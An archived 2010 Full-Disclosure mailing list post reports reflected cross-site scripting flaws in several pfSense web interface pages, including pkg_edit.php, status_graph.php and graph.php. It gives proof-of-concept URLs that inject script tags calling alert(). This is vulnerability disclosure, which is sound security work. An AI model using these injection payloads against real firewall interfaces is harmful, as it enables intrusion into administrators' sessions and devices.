[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] pfsense xss issues.

To: full-disclosure <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] pfsense xss issues.
From: dave b <db.pub.mail@xxxxxxxxx>
Date: Sat, 6 Nov 2010 15:08:32 +1100

"Those who cannot learn from history are doomed to repeat it." -
George Santayana

http://cvstrac.pfsense.org/chngview?cn=20994
"Comment:       Make scripts XSS input safe. "
Date:   2008-Feb-11 23:33:24 (local)  2008-Feb-12 04:33:24 (UTC)

So in 2010, pfsense 2 beta 4:

...
xss -> pkg_edit.php
https://10.0.20.220/pkg_edit.php?xml=olsrd.xml&id=%22/%3E%3Cscript%3Ealert%282%29;%3C/script%3E

xss ->  pkg.php
https://10.0.20.220/pkg.php?xml=jailctl.xm%27l%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
...

-----------
in pfsense 2 beta 4:
xss  -> status_graph.php

https://10.0.20.220/status_graph.php?if=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

xss -> interfaces.php
https://10.0.20.220/interfaces.php?if=wan%22%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
-------------

And  in  pfsense (stable and 2 beta 4):
http://10.0.20.222/graph.php?ifnum=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E&ifname=
or 
http://10.0.20.222/graph.php?ifnum=&ifname=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

--
question = ( to ) ? be : ! be;          -- Wm. Shakespeare

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [ MDVSA-2010:221 ] openoffice.org
Next by Date: [Full-disclosure] Vulnerabilities in PHPShop
Previous by thread: [Full-disclosure] [ MDVSA-2010:221 ] openoffice.org
Next by thread: [Full-disclosure] Vulnerabilities in PHPShop
Index(es):
- Date
- Thread